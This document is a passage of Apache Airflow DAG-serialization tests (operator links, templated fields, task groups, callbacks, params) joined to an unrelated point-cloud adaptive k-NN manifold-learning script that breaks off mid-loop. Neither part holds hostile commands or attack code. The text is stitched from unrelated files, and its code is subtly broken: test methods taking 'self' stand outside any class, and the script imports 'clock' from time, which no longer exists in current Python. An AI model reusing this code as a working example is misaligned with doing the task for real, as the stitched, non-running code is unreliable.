    """
    An OperatorLink that is neither built in nor registered via plugins must not
    break deserialization; the DAG still loads and an error is logged instead.
    """

    class TaskStateLink(BaseOperatorLink):
        """OperatorLink that is neither plugin-registered nor built in."""

        name = 'My Link'

        def get_link(self, operator, dttm):
            return 'https://www.google.com'

    class MyOperator(BaseOperator):
        """Operator carrying only the unregistered extra link above."""

        operator_extra_links = [TaskStateLink()]

        def execute(self, context):
            pass

    with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
        MyOperator(task_id='blah')

    blob = SerializedDAG.to_dict(dag)
    with caplog.at_level("ERROR", logger="airflow.serialization.serialized_objects"):
        SerializedDAG.from_dict(blob)

    assert (
        "Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' not registered"
    ) in caplog.text
def test_extra_serialized_field_and_multiple_operator_links(self):
    """
    Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
    This tests also depends on GoogleLink() registered as a plugin
    in tests/plugins/test_plugin.py
    The function tests that if extra operator links are registered in plugin
    in ``operator_extra_links`` and the same is also defined in
    the Operator in ``BaseOperator.operator_extra_links``, it has the correct
    extra link.
    """
    test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
    dag = DAG(dag_id='simple_dag', start_date=test_date)
    # A list-valued bash_command produces one indexed link per element.
    CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])

    serialized_dag = SerializedDAG.to_dict(dag)
    assert "bash_command" in serialized_dag["dag"]["tasks"][0]

    dag = SerializedDAG.from_dict(serialized_dag)
    simple_task = dag.task_dict["simple_task"]
    # Extra serialized field round-trips with the full list value.
    assert getattr(simple_task, "bash_command") == ["echo", "true"]

    #########################################################
    # Verify Operator Links work with Serialized Operator
    #########################################################
    # Check Serialized version of operator link only contains the inbuilt Op Link
    assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
        {'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
        {'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
    ]

    # Test all the extra_links are set (two indexed links + plugin links)
    assert set(simple_task.extra_links) == {
        'BigQuery Console #1',
        'BigQuery Console #2',
        'airflow',
        'github',
        'google',
    }

    # Each indexed link reads its value from this XCom list by position.
    XCom.set(
        key='search_query',
        value=["dummy_value_1", "dummy_value_2"],
        task_id=simple_task.task_id,
        dag_id=simple_task.dag_id,
        execution_date=test_date,
    )

    # Test Deserialized inbuilt link #1
    custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
    assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link

    # Test Deserialized inbuilt link #2
    custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
    assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link

    # Test Deserialized link registered via Airflow Plugin
    google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
    assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
    """Test helper: create an object with arbitrary attributes in a single call."""

    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)

    def __str__(self):
        return f"{self.__class__.__name__}({str(self.__dict__)})"

    def __repr__(self):
        return self.__str__()

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
@pytest.mark.parametrize(
    "templated_field, expected_field",
    [
        (None, None),
        ([], []),
        ({}, {}),
        ("{{ task.task_id }}", "{{ task.task_id }}"),
        # BUG FIX: this case was written as `(["...", "..."])` — a bare two-element
        # list, not a tuple — so pytest unpacked the list itself into the two
        # parameters and this silently duplicated the plain-string case above.
        # It is now a real (input, expected) pair exercising a list-valued field.
        (["{{ task.task_id }}", "{{ task.task_id }}"], ["{{ task.task_id }}", "{{ task.task_id }}"]),
        ({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
        ({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
        (
            [{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
            [{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
        ),
        (
            {"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
            {"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
        ),
        # Non-"basic" objects must come back as their string representation.
        (
            ClassWithCustomAttributes(
                att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
            ),
            "ClassWithCustomAttributes("
            "{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
        ),
        (
            ClassWithCustomAttributes(
                nested1=ClassWithCustomAttributes(
                    att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
                ),
                nested2=ClassWithCustomAttributes(
                    att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
                ),
                template_fields=["nested1"],
            ),
            "ClassWithCustomAttributes("
            "{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
            "'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
            "'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
            "'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
        ),
    ],
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
    """
    Test that templated_fields exists for all Operators in Serialized DAG.

    Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
    we want to check that non-"basic" objects are turned in to strings after deserializing.
    """
    dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
    with dag:
        BashOperator(task_id="test", bash_command=templated_field)

    serialized_dag = SerializedDAG.to_dict(dag)
    deserialized_dag = SerializedDAG.from_dict(serialized_dag)
    deserialized_test_task = deserialized_dag.task_dict["test"]
    assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
    """
    Additional properties are disabled on DAGs, so every key returned by
    DAG.get_serialized_fields must be listed in the JSON schema definition.
    """
    schema_props: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]

    # Keys injected manually during serialization — not real DAG fields.
    serialization_only_keys: set = {
        "is_subdag",
        "tasks",
        "has_on_success_callback",
        "has_on_failure_callback",
        "dag_dependencies",
        "params",
    }
    # Kept in the schema only so older serialized DAGs still validate.
    legacy_keys: set = {
        "_concurrency",
    }

    expected_fields = set(schema_props) - serialization_only_keys - legacy_keys
    assert set(DAG.get_serialized_fields()) == expected_fields
def test_operator_subclass_changing_base_defaults(self):
    """A subclass may flip a BaseOperator default; serialization must keep the subclass value."""
    assert (
        BaseOperator(task_id='dummy').do_xcom_push is True
    ), "Precondition check! If this fails the test won't make sense"

    class MyOperator(BaseOperator):
        def __init__(self, do_xcom_push=False, **kwargs):
            super().__init__(**kwargs)
            self.do_xcom_push = do_xcom_push

    op = MyOperator(task_id='dummy')
    assert op.do_xcom_push is False

    # The non-default value must survive a serialize/deserialize round-trip.
    round_tripped = SerializedBaseOperator.deserialize_operator(
        SerializedBaseOperator.serialize_operator(op)
    )
    assert round_tripped.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
    """
    This test verifies that there are no new fields added to BaseOperator. And reminds that
    tests should be added for it.
    """
    base_operator = BaseOperator(task_id="10")
    fields = base_operator.__dict__
    # Exhaustive snapshot of every instance attribute a default BaseOperator
    # carries; any new attribute must be added here AND to the serialization
    # schema (see the assertion message below).
    assert {
        '_BaseOperator__instantiated': True,
        '_dag': None,
        '_downstream_task_ids': set(),
        '_inlets': [],
        '_log': base_operator.log,
        '_outlets': [],
        '_upstream_task_ids': set(),
        '_pre_execute_hook': None,
        '_post_execute_hook': None,
        'depends_on_past': False,
        'do_xcom_push': True,
        'doc': None,
        'doc_json': None,
        'doc_md': None,
        'doc_rst': None,
        'doc_yaml': None,
        'email': None,
        'email_on_failure': True,
        'email_on_retry': True,
        'end_date': None,
        'execution_timeout': None,
        'executor_config': {},
        'inlets': [],
        'label': '10',
        'max_active_tis_per_dag': None,
        'max_retry_delay': None,
        'on_execute_callback': None,
        'on_failure_callback': None,
        'on_retry_callback': None,
        'on_success_callback': None,
        'outlets': [],
        'owner': 'airflow',
        'params': {},
        'pool': 'default_pool',
        'pool_slots': 1,
        'priority_weight': 1,
        'queue': 'default',
        'resources': None,
        'retries': 0,
        'retry_delay': timedelta(0, 300),
        'retry_exponential_backoff': False,
        'run_as_user': None,
        'sla': None,
        'start_date': None,
        'subdag': None,
        'task_id': '10',
        'trigger_rule': 'all_success',
        'wait_for_downstream': False,
        'weight_rule': 'downstream',
    } == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
    """
    Test TaskGroup serialization/deserialization.
    """
    from airflow.operators.dummy import DummyOperator
    from airflow.utils.task_group import TaskGroup

    execution_date = datetime(2020, 1, 1)
    # Build a DAG with a nested group hierarchy:
    # task1 >> group234 (task2, group34 (task3, task4)) ; group34 >> task5
    # NOTE(review): nesting reconstructed from group names — group34 appears
    # to live inside group234; confirm against the original file layout.
    with DAG("test_task_group_serialization", start_date=execution_date) as dag:
        task1 = DummyOperator(task_id="task1")
        with TaskGroup("group234") as group234:
            _ = DummyOperator(task_id="task2")
            with TaskGroup("group34") as group34:
                _ = DummyOperator(task_id="task3")
                _ = DummyOperator(task_id="task4")
        task5 = DummyOperator(task_id="task5")
        task1 >> group234
        group34 >> task5

    dag_dict = SerializedDAG.to_dict(dag)
    SerializedDAG.validate_schema(dag_dict)
    json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
    self.validate_deserialized_dag(json_dag, dag)

    serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))

    # The deserialized root group mirrors the original group structure.
    assert serialized_dag.task_group.children
    assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()

    def check_task_group(node):
        # Groups have .children; operators don't (AttributeError marks a leaf).
        try:
            children = node.children.values()
        except AttributeError:
            # Round-trip serialization and check the result
            expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
            expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
            expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
            assert node
            assert SerializedBaseOperator.serialize_operator(node) == expected_dict
            return

        for child in children:
            check_task_group(child)

    check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
    """serialize_operator must emit the operator's deps in sorted order."""
    from airflow.operators.dummy import DummyOperator
    from airflow.sensors.external_task import ExternalTaskSensor

    with DAG(dag_id="test_deps_sorted", start_date=datetime(2020, 1, 1)) as dag:
        sensor = ExternalTaskSensor(
            task_id="task1",
            external_dag_id="external_dag_id",
            mode="reschedule",
        )
        sensor >> DummyOperator(task_id="task2")

    blob = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
    assert blob["deps"] == [
        'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
        'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
        'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
        'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
        'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
    ]
def test_task_group_sorted(self):
    """
    Tests serialize_task_group, make sure the list is in order
    """
    from airflow.operators.dummy import DummyOperator
    from airflow.serialization.serialized_objects import SerializedTaskGroup
    from airflow.utils.task_group import TaskGroup

    # Diamond-shaped group topology used below:
    """
                    start
                   ╱      ╲
                 ╱          ╲
    task_group_up1          task_group_up2
        (task_up1)          (task_up2)
                 ╲          ╱
              task_group_middle
                (task_middle)
                 ╱          ╲
    task_group_down1        task_group_down2
       (task_down1)         (task_down2)
                 ╲          ╱
                   ╲      ╱
                      end
    """
    execution_date = datetime(2020, 1, 1)
    with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
        start = DummyOperator(task_id="start")
        with TaskGroup("task_group_up1") as task_group_up1:
            _ = DummyOperator(task_id="task_up1")

        with TaskGroup("task_group_up2") as task_group_up2:
            _ = DummyOperator(task_id="task_up2")

        with TaskGroup("task_group_middle") as task_group_middle:
            _ = DummyOperator(task_id="task_middle")

        with TaskGroup("task_group_down1") as task_group_down1:
            _ = DummyOperator(task_id="task_down1")

        with TaskGroup("task_group_down2") as task_group_down2:
            _ = DummyOperator(task_id="task_down2")

        end = DummyOperator(task_id='end')

        start >> task_group_up1
        start >> task_group_up2
        task_group_up1 >> task_group_middle
        task_group_up2 >> task_group_middle
        task_group_middle >> task_group_down1
        task_group_middle >> task_group_down2
        task_group_down1 >> end
        task_group_down2 >> end

    # The middle group has two upstream groups/tasks — both lists must be sorted.
    task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
        dag.task_group.children["task_group_middle"]
    )
    upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
    assert upstream_group_ids == ['task_group_up1', 'task_group_up2']

    upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
    assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']

    downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
    assert downstream_group_ids == ['task_group_down1', 'task_group_down2']

    task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
        dag.task_group.children["task_group_down1"]
    )
    downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
    assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
    """Edge labels (edge_info) must survive serialization round-trips."""
    from airflow.operators.dummy import DummyOperator
    from airflow.utils.edgemodifier import Label

    with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
        upstream = DummyOperator(task_id="task1")
        downstream = DummyOperator(task_id="task2")
        upstream >> Label("test label") >> downstream

    dag_dict = SerializedDAG.to_dict(dag)
    SerializedDAG.validate_schema(dag_dict)
    self.validate_deserialized_dag(SerializedDAG.from_json(SerializedDAG.to_json(dag)), dag)

    restored = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
    assert restored.edge_info == dag.edge_info
@pytest.mark.parametrize(
    "mode, expect_custom_deps",
    [
        ("poke", False),
        ("reschedule", True),
    ],
)
def test_serialize_sensor(self, mode, expect_custom_deps):
    """Custom deps are serialized only for reschedule mode, and deps round-trip intact."""
    from airflow.sensors.base import BaseSensorOperator

    class DummySensor(BaseSensorOperator):
        def poke(self, context):
            return False

    op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
    blob = SerializedBaseOperator.serialize_operator(op)

    assert ("deps" in blob) is expect_custom_deps
    assert SerializedBaseOperator.deserialize_operator(blob).deps == op.deps
@pytest.mark.parametrize(
    "passed_success_callback, expected_value",
    [
        ({"on_success_callback": lambda x: print("hi")}, True),
        ({}, False),
    ],
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
    """
    has_on_success_callback is stored in the serialized blob only when the DAG
    actually has an on_success_callback; otherwise it defaults to False after
    deserialization.
    """
    dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
    BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))

    blob = SerializedDAG.to_dict(dag)
    assert ("has_on_success_callback" in blob["dag"]) is expected_value
    assert SerializedDAG.from_dict(blob).has_on_success_callback is expected_value
@pytest.mark.parametrize(
    "passed_failure_callback, expected_value",
    [
        ({"on_failure_callback": lambda x: print("hi")}, True),
        ({}, False),
    ],
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
    """
    has_on_failure_callback is stored in the serialized blob only when the DAG
    actually has an on_failure_callback; otherwise it defaults to False after
    deserialization.
    """
    dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
    BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))

    blob = SerializedDAG.to_dict(dag)
    assert ("has_on_failure_callback" in blob["dag"]) is expected_value
    assert SerializedDAG.from_dict(blob).has_on_failure_callback is expected_value
@pytest.mark.parametrize(
    "object_to_serialized, expected_output",
    [
        # list: original order preserved
        (
            ['task_1', 'task_5', 'task_2', 'task_4'],
            ['task_1', 'task_5', 'task_2', 'task_4'],
        ),
        # set: sorted for deterministic output
        (
            {'task_1', 'task_5', 'task_2', 'task_4'},
            ['task_1', 'task_2', 'task_4', 'task_5'],
        ),
        # tuple: serialized as a list, order preserved
        (
            ('task_1', 'task_5', 'task_2', 'task_4'),
            ['task_1', 'task_5', 'task_2', 'task_4'],
        ),
        # dicts nested inside a list get the __type/__var envelope
        (
            {
                "staging_schema": [
                    {"key:": "foo", "value": "bar"},
                    {"key:": "this", "value": "that"},
                    "test_conf",
                ]
            },
            {
                "staging_schema": [
                    {"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
                    {
                        "__type": "dict",
                        "__var": {"key:": "this", "value": "that"},
                    },
                    "test_conf",
                ]
            },
        ),
        # dict: keys sorted
        (
            {"task3": "test3", "task2": "test2", "task1": "test1"},
            {"task1": "test1", "task2": "test2", "task3": "test3"},
        ),
        # heterogeneous tuple: order preserved, nested list untouched
        (
            ('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
            ['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
        ),
    ],
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
    """Test Serialized Sets are sorted while list and tuple preserve order"""
    serialized_obj = SerializedDAG._serialize(object_to_serialized)
    # Unwrap the __type/__var envelope that non-JSON-native containers receive.
    if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
        serialized_obj = serialized_obj["__var"]
    assert serialized_obj == expected_output
def test_params_upgrade(self):
    """Old-style plain-value params deserialize into Param wrappers with the raw value."""
    blob = {
        "__version": 1,
        "dag": {
            "_dag_id": "simple_dag",
            "fileloc": __file__,
            "tasks": [],
            "timezone": "UTC",
            "params": {"none": None, "str": "str", "dict": {"a": "b"}},
        },
    }
    SerializedDAG.validate_schema(blob)
    dag = SerializedDAG.from_dict(blob)

    # Resolved access yields the raw value, but the stored object is a Param.
    assert dag.params["none"] is None
    assert isinstance(dict.__getitem__(dag.params, "none"), Param)
    assert dag.params["str"] == "str"
def test_params_serialize_default(self):
    """A serialized Param class reference with a default deserializes into a Param object."""
    blob = {
        "__version": 1,
        "dag": {
            "_dag_id": "simple_dag",
            "fileloc": __file__,
            "tasks": [],
            "timezone": "UTC",
            "params": {"str": {"__class": "airflow.models.param.Param", "default": "str"}},
        },
    }
    SerializedDAG.validate_schema(blob)
    dag = SerializedDAG.from_dict(blob)

    assert isinstance(dict.__getitem__(dag.params, "str"), Param)
    assert dag.params["str"] == "str"
def test_kubernetes_optional():
    """Serialisation / deserialisation continues to work without kubernetes installed"""

    def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
        # Simulate an environment where the kubernetes package is not installed,
        # while delegating every other (absolute) import to the real machinery.
        if level == 0 and name.partition('.')[0] == 'kubernetes':
            raise ImportError("No module named 'kubernetes'")
        return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)

    with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
        # load module from scratch, this does not replace any already imported
        # airflow.serialization.serialized_objects module in sys.modules
        spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)

        # if we got this far, the module did not try to load kubernetes, but
        # did it try to access airflow.kubernetes.*?
        imported_airflow = {
            c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
        }
        assert "kubernetes" not in imported_airflow

        # pod loading is not supported when kubernetes is not available
        pod_override = {
            '__type': 'k8s.V1Pod',
            '__var': PodGenerator.serialize_pod(executor_config_pod),
        }

        with pytest.raises(RuntimeError):
            module.BaseSerialization.from_dict(pod_override)

        # basic serialization should succeed
        module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
adaptive_manfold_learning_knn.py | import os
import sys
import numpy as np
import scipy
import scipy.sparse as sp
import matplotlib.pyplot as plt
from sklearn.neighbors import NearestNeighbors
from sklearn.decomposition import PCA
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
# from multiprocessing import Pool as ThreadPool
from time import clock, sleep
import math
def timeit(func):
    """Decorator that prints the wall-clock duration of each call to *func*.

    Returns the wrapped function's result unchanged.

    BUG FIX: the original used time.clock(), which was deprecated since
    Python 3.3 and removed in Python 3.8; perf_counter() is the documented
    replacement. functools.wraps is also applied so the wrapped function
    keeps its name/docstring.
    """
    import functools
    from time import perf_counter

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        starting_time = perf_counter()
        result = func(*args, **kwargs)
        ending_time = perf_counter()
        print('Duration: {}'.format(ending_time - starting_time))
        return result

    return wrapper
@timeit
def hello():
    """Demo: map a small worker over [0, 1, 2] using a 4-worker thread pool."""
    hello_list = list(range(3))
    print(hello_list)

    def process(i):
        a = math.sqrt(i * i + 1)  # computed but never used in the result
        result = [i]
        return result

    pool = ThreadPool(4)
    results = pool.map(process, hello_list)
    pool.close()
    pool.join()
    print(results)
@timeit
def adaptive_knn(filename=None, savename=None, d=2, k_max=16, k_min=None):
    """Build a per-point adaptive k-NN graph for every model in a .npy dataset.

    For each point the neighborhood size is shrunk from k_max toward k_min
    until the neighborhood looks locally d-dimensional (STEP 1), then
    tentatively re-expanded with neighbors that fit the local PCA plane
    (STEP 2). The resulting graphs are saved as scipy CSR adjacency matrices.

    Args:
        filename: path to a .npy file whose pickled dict has a 'data' entry
            of shape (n_model, n_point, 3).
        savename: output path; derived from *filename* when None.
        d: assumed intrinsic dimensionality of the local manifold.
        k_max: initial (largest) neighborhood size tried per point.
        k_min: smallest neighborhood size tried; defaults to d + 4.
    """
    if (filename == None):
        print("need a file name")
        return
    modelnet10 = np.load(filename, encoding='latin1', allow_pickle=True)
    modelnet10_data = modelnet10.tolist()['data']  # (3991, 1024, 3)
    # modelnet10_label = modelnet10.tolist()['label'] #(3991,)
    # modelnet10_seg = modelnet10.tolist()['seg_label'] #(n_model, 2048, C)
    del modelnet10  # free the raw array; only 'data' is needed below
    print("the dataset shape is {}".format(modelnet10_data.shape))
    n_model, n_point, _ = modelnet10_data.shape
    print("k_max={}".format(k_max))
    start = n_model // 4 * 0
    end = n_model
    print('process start={},end={}'.format(start, end))
    # modelnet10_data=modelnet10_data[start:end]
    result_knn = []
    # d=2
    # k_max=16
    if k_min is None:  # 6
        k_min = d + 4
    # yita: threshold on the residual-to-plane singular-value ratio
    yita = 0.32
    print('k_max={}'.format(k_max))
    print('k_min={}'.format(k_min))
    print('yita={}'.format(yita))
    for model_i in range(start, end):
        if (model_i % 100 == 0):
            print(model_i)
        X = modelnet10_data[model_i]  # i-th model, shape=(1024,3)
        # k_max+1 neighbors because the closest neighbor is the point itself
        nbrs = NearestNeighbors(n_neighbors=k_max + 1,
                                algorithm='ball_tree').fit(X)
        distances, indices = nbrs.kneighbors(X)
        indx = indices[:, 1:]  # nearest k_max neighbors (self excluded)
        n, m = X.shape
        # STEP 1: shrink each neighborhood until it looks locally d-dimensional
        rho = [[] for i in range(n)]  # residual ratios tried per point
        result_indx = [[] for i in range(n)]  # accepted neighbor ids per point
        for i in range(n):
            flag = 0
            tmp = indx[i]
            X_k = np.transpose(X[tmp])  # (nfeatures, npoints)
            for j in range(k_max, k_min, -1):
                x_i = np.mean(X_k, axis=1).reshape(-1, 1)  # (nfeatures, 1)
                X_i = X_k - x_i
                # compute singular values; d=2 (8), k_min=d+4 , yita=0.32
                u, sigma, v = np.linalg.svd(X_i, full_matrices=False)
                sigma = sigma**2
                # ratio of out-of-plane to in-plane energy (d=2 hard-coded here)
                r_i = np.sqrt(np.sum(sigma[2:]) / np.sum(sigma[:2]))
                if r_i < yita:
                    # neighborhood is flat enough: keep the first j neighbors
                    result_indx[i] = indx[i][:j]
                    rho[i].append(r_i)
                    flag = 1
                    break
                rho[i].append(r_i)
                X_k = X_k[:, :-1]  # drop the farthest neighbor and retry
            if flag == 0:
                # never flat enough: keep the size with the smallest residual
                max_k = np.argmin(rho[i])
                result_indx[i] = indx[i][:k_max - max_k]
        # STEP 2: re-admit dropped neighbors that fit the local PCA plane
        for i in range(n):
            X1 = X[result_indx[i]].copy()  # the neighborhood of i-th point
            x2_indx = indx[i][len(result_indx[i]):]  # candidates dropped in STEP 1
            X2 = X[x2_indx]  # (N_SMAPLE, N_FEATURE)
            if X2.shape[0] == 0:
                continue
            pca = PCA(n_components=2)
            pca.fit(X1)
            # pca_score = pca.explained_variance_ratio_
            V = pca.components_
            # pca_X1=pca.fit_transform(X1)
            # project candidates onto the plane fitted to the kept neighborhood
            mypca_X2 = np.dot(X2 - pca.mean_, V.T)  # (N_SAMPLE, N_FEATURE')
            recover_X2 = pca.inverse_transform(mypca_X2)
            # accept a candidate when its off-plane residual is small relative
            # to its in-plane magnitude (same yita threshold as STEP 1)
            do_select = np.linalg.norm(
                X2 - recover_X2,
                axis=1) <= yita * np.linalg.norm(mypca_X2, axis=1)
            NE = [
                x2_indx[idx] for idx, ii in enumerate(do_select) if ii == True
            ]  # Neighborhood Expansion
            if NE != []:
                result_indx[i] = np.append(result_indx[i], NE)
            # print(np.linalg.norm(X2-recover_X2,axis=1))
            # print(yita*np.linalg.norm(mypca_X2,axis=1))
            # print(do_select)
            # print(np.linalg.norm(np.dot(X1-pca.mean_,V.T)-pca_X1))
            # print(np.linalg.norm(pca.inverse_transform(pca_XX)-XX))
        result_knn.append(result_indx)
    if (len(result_knn) != end -
            start):  # n_moddel(list), n_points(list), n_neiberhood(np.array)
        raise Exception("len of result_knn!=n_model")
    # convert list-of-neighbor-lists to a sparse adjacency matrix per model
    for i in range(end - start):
        data = result_knn[i]
        row_ = []
        col_ = []
        for row, cols in enumerate(data):
            row_ += [row for _ in cols]
            col_ += list(cols)
        sp_data = sp.csr_matrix(
            (np.ones(len(row_), dtype='int32'), (row_, col_)),
            shape=(n_point, n_point))
        result_knn[i] = sp_data
    # savename='./modelnet/data/modelNet40_train_16nn_GM_adaptive_knn_sparse.npy'
    if (savename == None):
        # e.g.
        # filename = './modelnet/data/modelNet10_train_16nn_GM.npy'
        # savename = ./modelnet/data/modelNet10_train_16nn_GM_adaptive_knn.npy
        savename = "".join(
            filename.split('.npy')) + "_adaptive_knn_sparse_4.npy"
    # shapenet 50
    np.save(
        savename,
        np.array({  #'data': modelnet10_data,
            'graph': result_knn
            #'seg_label': modelnet10_seg,
            #'label': modelnet10_label
        }))  #'label_dict':test_modelnet10_label_dict,
    # np.save(savename, np.array(result_knn))
    print("saved to {}".format(savename))
def do_work(result_knn, modelnet10_data, start, stop, k_max, d):
    """Worker: compute adaptive k-NN neighborhoods for models [start, stop).

    Same two-step algorithm as adaptive_knn (shrink until locally
    d-dimensional, then PCA-based re-expansion), but writes the per-model
    neighbor lists into the shared ``result_knn[start:stop]`` slice instead
    of returning them — intended for use with multiprocessing.

    Args:
        result_knn: shared list; slice [start:stop) is overwritten in place.
        modelnet10_data: array of shape (n_model, n_point, 3).
        start, stop: half-open range of model indices this worker handles.
        k_max: initial (largest) neighborhood size tried per point.
        d: assumed intrinsic dimensionality (k_min is derived as d + 4).
    """
    result_knn_ = []
    for model_i in range(start, stop):
        if (model_i % 10 == 0):
            print(model_i)
        X = modelnet10_data[model_i]  # i-th model, shape=(1024,3)
        # k_max+1 neighbors because the closest neighbor is the point itself
        nbrs = NearestNeighbors(n_neighbors=k_max + 1,
                                algorithm='ball_tree').fit(X)
        distances, indices = nbrs.kneighbors(X)
        indx = indices[:, 1:]  # nearest k_max neighbors (self excluded)
        # d=2
        # k_max=16
        k_min = d + 4  # 6
        n, m = X.shape
        # STEP 1: shrink each neighborhood until it looks locally d-dimensional
        rho = [[] for i in range(n)]  # residual ratios tried per point
        result_indx = [[] for i in range(n)]  # accepted neighbor ids per point
        yita = 0.32  # threshold on the residual-to-plane singular-value ratio
        for i in range(n):
            flag = 0
            tmp = indx[i]
            X_k = np.transpose(X[tmp])  # (nfeatures, npoints)
            for j in range(k_max, k_min, -1):
                x_i = np.mean(X_k, axis=1).reshape(-1, 1)  # (nfeatures, 1)
                X_i = X_k - x_i
                # compute singular values, d=2 (8), k_min=d+4 , yita=0.32
                u, sigma, v = np.linalg.svd(X_i, full_matrices=False)
                sigma = sigma**2
                # ratio of out-of-plane to in-plane energy (d=2 hard-coded here)
                r_i = np.sqrt(np.sum(sigma[2:]) / np.sum(sigma[:2]))
                if r_i < yita:
                    # neighborhood is flat enough: keep the first j neighbors
                    result_indx[i] = indx[i][:j]
                    rho[i].append(r_i)
                    flag = 1
                    break
                rho[i].append(r_i)
                X_k = X_k[:, :-1]  # drop the farthest neighbor and retry
            if flag == 0:
                # never flat enough: keep the size with the smallest residual
                max_k = np.argmin(rho[i])
                result_indx[i] = indx[i][:k_max - max_k]
        # STEP 2: re-admit dropped neighbors that fit the local PCA plane
        for i in range(n):
